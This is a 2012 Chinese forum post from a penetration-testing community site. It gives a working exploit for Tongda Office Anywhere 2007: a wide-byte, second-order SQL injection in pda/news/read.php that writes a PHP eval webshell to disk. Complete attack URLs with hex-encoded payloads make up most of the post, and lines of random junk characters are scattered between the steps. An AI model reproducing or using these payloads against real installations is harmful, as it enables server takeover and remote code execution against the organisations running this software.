中国网络渗透测试联盟
标题:
通达OA2007版本漏洞及getshell
[打印本页]
作者:
admin
时间:
2012-12-20 08:09
标题:
通达OA2007版本漏洞及getshell
目前测试通达OA2007版本
M' C( L) l" H7 O# c. o% h/ w q
7 y: T& |$ u) @- \' [& ~
, T y, a' W7 R4 b8 d: H
Office Anywhere 2007 网络智能办公系统
6 M5 h2 j6 n* N8 E; Y$ U' H
8 z6 h2 x) j4 P
http://127.0.0.1/pda/news/read.php?P=%cf'
猪点。 暴web目录..
& ~) y$ v% {) Y6 R( @
( e' t& Y1 e$ {' ^8 Z& N6 h
* v j% Z+ |7 p) `
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
1 @9 }9 o1 ]& }$ ^* Y
: P T$ I9 _7 g& u) i
例如:SELECT * from USER where USER_ID='{$USERNAME}'
8 O0 }& B* K8 i) N. S1 t- B( k; L
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
J3 T' ~: V% f; x
: `& r( P0 |" y0 W3 K/ J0 |
这个时候我们是不是可以组合起来使用哪?
2 }& i; Y7 y' z3 ?3 F' g9 E9 ^
Q: ^9 l& c- a/ ?; Z1 |% P
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
6 r" t+ B% l# c; `/ G
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
& k! c. _/ p: H8 i! w7 O1 B9 C
: \( m& n" J& w$ F3 b0 i9 Q
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
# i/ A! ?+ P! v0 j; M' C* i
! x7 x! h% F/ v& _" {3 B2 M
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
9 `1 w8 z6 f( }, o7 M4 l |
p. T# ^2 x o8 Z
那么我们用字符串格式带入进行hex编码
) |9 r5 y" C( _; c& n/ t8 d, G5 T
* ~/ ~/ ?" w0 T
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
2 X* r* q* L/ G
" o- p) ?6 j" R& Q* v6 ?
测试ok,获取oa的webshell
# V4 L# t+ ]% [/ o2 g+ f
8 z5 g6 w9 @( w
8 w% M6 I, @% `. l
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
1 S: ^* k H# }- s( [; v
直接getwebshell
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2